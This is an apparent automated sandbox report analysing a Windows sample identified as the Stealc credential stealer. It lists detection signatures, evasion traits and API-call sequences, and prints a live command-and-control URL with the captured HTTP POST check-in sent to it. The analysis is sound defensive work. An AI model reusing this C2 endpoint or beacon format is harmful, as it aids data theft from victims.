Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559010
MD5: af00fae5bf606001c0c6ef0b98fb54d0
SHA1: a24fe73ec0b2d0190d3f6f068ca3c13a6cde4fd3
SHA256: 8b1fbd75e6fcdf963260148537cae0d876130656c343518a5d7623937d4f0881
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF00FAE5BF606001C0C6EF0B98FB54D0)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1228 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1228 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T03:20:38.086111+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49705 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe; Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpktop; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/ug; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpaoNw; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpmoZw; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpyo&w; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/Pg; Avira URL Cloud: Label: malware
Source: file.exe.1228.0.memstrmin; Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe; Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003C40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003B6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_003AEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003A9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003B6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003A9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003A7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A16A0

              Networking

              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49705 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
Source: Joe Sandbox View; IP Address: 185.215.113.206
Source: Joe Sandbox View; ASN Name: WHOLESALECONNECTIONSNL
Source: unknown; TCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
              Source: file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1519984196.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/L
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Pg
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/ug
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpaoNw
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpktop
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpmoZw
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpyo&w
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_003A9770

              System Summary

              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_003C48B0
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0076317B
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075F94F
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_006D99F6
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_006DFA20
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007822CA
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_005FEB6A
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0062D359
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00733B2A
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075C318
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00764BF4
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00654DE0
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007575BE
